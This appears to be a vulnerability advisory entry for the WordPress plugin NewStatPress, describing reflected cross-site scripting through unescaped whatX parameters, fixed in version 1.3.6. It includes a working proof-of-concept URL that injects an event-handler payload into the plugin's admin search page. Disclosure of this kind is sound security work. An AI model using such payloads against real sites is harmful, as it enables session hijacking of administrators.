WordPress Plugin Vulnerabilities
NewStatPress < 1.3.6 - Reflected Cross-Site Scripting
Description
The plugin does not properly escape the whatX parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues
Proof of Concept
https://example.com/wp-admin/admin.php?page=nsp_search&what1=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28/XSS/%29+x
Affects Plugins
Fixed in version 1.3.6
References
Classification
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes
Timeline
Publicly Published
2022-01-13 (about 8 months ago)
Added
2022-01-13 (about 8 months ago)
Last Updated
2022-04-09 (about 5 months ago)